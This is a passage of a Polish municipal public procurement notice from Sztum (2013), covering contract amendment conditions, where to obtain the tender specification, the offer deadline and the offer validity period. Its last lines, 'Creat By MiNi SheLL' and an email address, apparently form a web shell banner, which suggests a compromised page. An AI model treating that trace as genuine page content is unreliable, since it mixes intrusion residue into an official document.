2)	warunków i terminów płatności,
4.	Zmiany, o których mowa w pkt 3 mogą nastąpić jedynie w uzasadnionych przypadkach, a w szczególności: 
1)	w przypadku wystąpienia siły wyższej. Pod pojęciem siły wyższej Zamawiający rozumie okoliczności, które pomimo zachowania należytej staranności są nieprzewidywalne oraz którym nie można zapobiec bądź przeciwdziałać skutecznie. O braku możliwości dotrzymania terminu Wykonawca obowiązany jest niezwłocznie zawiadomić Zamawiającego, określając jednocześnie nowy termin realizacji zamówienia,
2)	gdy zaistniały okoliczności, których nie można było przewidzieć na etapie zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.sztum.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko - Gminny Zespół Oświaty w Sztumie
ul. Mickiewicza 39, 82-400 Sztum
pokój: 46 (II piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2013 godzina 11:00, miejsce: Miejsko - Gminny Zespół Oświaty w Sztumie
ul. Mickiewicza 39, 82-400 Sztum
pokój: 46 (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com